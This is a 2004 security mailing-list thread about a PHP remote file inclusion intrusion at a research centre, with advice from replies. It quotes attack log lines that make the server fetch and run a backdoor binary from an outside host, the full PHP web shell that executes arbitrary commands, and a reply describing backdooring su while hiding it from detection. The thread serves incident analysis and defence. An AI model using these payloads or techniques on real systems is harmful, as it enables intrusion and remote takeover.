[Date Prev][Date Next][Thread Prev][Thread Next][Date Index][Thread Index]

Re: Hack attempt



Correct me if I am wrong doesnt chkrootkit only check system files for kits.
Loos like he just downloaded normal tools not having any back doors in them. A
eggdrop it self it is not considered a trojan unless it is not wanted. But how
does chkrootkit know if it is wanted or not.

I also would not rely on chkrootkit. I ran a root war once where i downloaded
the gunu source for the su command backdoored it with a second arg and
installed it using touch to change the date. chkrootkit did not detect this
change.

Quoting Kevin Johnson <kjohnson@secureideas.net>:

> Hi-
>
> It appears that the file <some script>.php is vulnerable to a file
> injection.  Basically what that means is that is accepts what ever value
> someone put into the bodyfile variable and inserts its code before
> parsing the script.  This allows the attacker to run what ever code as
> the user that your web server runs as.  You will need to fix the code to
> not allow inserting remote files.
>
> If you need anymore information, feel free to reply and I will try to
> help.
>
> Kevin Johnson
>
>
> On Wed, 2004-07-21 at 11:02, Norbert Crettol wrote:
> > Hi all.
> >
> > This is my first post here. I'm Norbert Crettol, one of the sysadmins
> > of Idiap, a research center in Switzerland (www.idiap.ch).
> >
> > We've had a undesired visitor, last night, that I discovered in the
> > reports of tripwire.
> >
> > Here are the logs we got (we get a remote copy of the web server logs
> > in another host). As of the second line, I've stripped the head and
> > the tail of the line which is allways the same.
> > --- begin ---
> > "GET /<some
> script>.php?bodyfile=http://www.bosscalvin.com/inject.txt?&cmd=id HTTP/1.0"
> 200 6625 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows 98)"
> > bodyfile=http://www.bosscalvin.com/inject.txt?&cmd=uname%20-a
> > bodyfile=http://www.bosscalvin.com/inject.txt?&cmd=wget
> > bodyfile=http://www.bosscalvin.com/inject.txt?&cmd=/sbin/ifconfig%20-a
> > bodyfile=http://www.bosscalvin.com/inject.txt?&cmd=cd%20/var/;ls%20-la
> > bodyfile=http://www.bosscalvin.com/inject.txt?&cmd=cd%20/var/lock/;ls%20-la
> >
>
bodyfile=http://www.bosscalvin.com/inject.txt?&cmd=cd%20/var/lock/;wget%20bosscalvin.com/bind2080
> >
>
bodyfile=http://www.bosscalvin.com/inject.txt?&cmd=cd%20/var/lock/;chmod%20755%20bind2080
> >
> bodyfile=http://www.bosscalvin.com/inject.txt?&cmd=cd%20/var/lock/;./bind2080
> > --- end ---
> > I've seen no other
> >
> > It looks like bind8080 has created a directory /var/lock/.tmp
> > and expanded an (owned by the web server owner) archive there. Here
> > is the list of the files :
> >       3225 jui 20 03:53 c-leet
> >         15 jui 20 03:47 c-leet.dir
> >         51 jui 20 03:47 cron.d
> >        512 mai 12  2002 doc/
> >         14 jui 21 16:27 eggdrop -> eggdrop-1.6.10*
> >    2523568 mai 12  2002 eggdrop-1.6.10*
> >        512 mai 12  2002 filesys/
> >        343 fév 11 03:55 fuck*
> >        512 mai 12  2002 help/
> >      21149 nov  4  2003 kik*
> >       1024 jui 21 11:00 language/
> >        512 mai 12  2002 logs/
> >          6 jui 20 03:48 pid.CaEm-
> >      23065 jan 29 15:00 proc*
> >          6 jui 20 03:48 psybnc.pid
> >      28591 mai 12  2002 README
> >         89 jui 20 03:53 run*
> >        588 avr  1 10:00 run-*
> >        708 avr  1 10:00 run--*
> >        512 mar 31 08:12 scripts/
> >        512 mai 12  2002 text/
> >    2523568 mar 28 01:41 vi*
> >      30293 nov 17  2002 xhide*
> >        182 jui 20 03:47 y2kupdate*
> >
> > Here is the content of http://www.bosscalvin.com/inject.txt :
> > --- begin ---
> > <font color="red">
> > <br><font face="Comic Sans MS" size="2"><center>
> > <b>CMD</b> - System Command<br><br></center></font><font face="Verdana"
> size="1"></center><br>
> > <b>#</b> CMD PHP : <br>
> > <b>#</b> Released by : <b>SecurityCorp</b><br>
> > <b>#</b> Edited by CaEm
> > <br>
> > <br>
> > <hr color="red" width=751px height=115px>
> > <br>
> > <pre><font face="Verdana" size="1">
> > <?
> >   // CMD - To Execute Command on File Injection Bug ( gif - jpg - txt )
> >   if (isset($chdir)) @chdir($chdir);
> >   ob_start();
> >   system("$cmd 1> /tmp/nobody 2>&1; cat /tmp/nobody; rm -rf /tmp/nobody");
> >   $output = ob_get_contents();
> >   ob_end_clean();
> >   if (!empty($output)) echo str_replace(">", "&gt;", str_replace("<",
> "&lt;", $output));
> > ?>
> > </font></pre>
> > <br>
> > <hr color="red" width=751px height=115px>
> > <br>
> > <font face="Comic Sans MS" size="1"><b>« CaEm » </b><br><b>@ </b><b>
> îrç.�å£.ñët <i>#Renjana</i></b><br>
> > --- end ---
> >
> > Has someone seen this kind of attack ? (chkrootkit doesn't detect it).
> > Has someone heard of this www.bosscalvin.com (or www.calvinmumu.org) ?
> > Is there a way to stop this guy ? His nickname (CaEm) appears in the
> > the uploaded scripts.
> >
> > Norbert
> >
>
>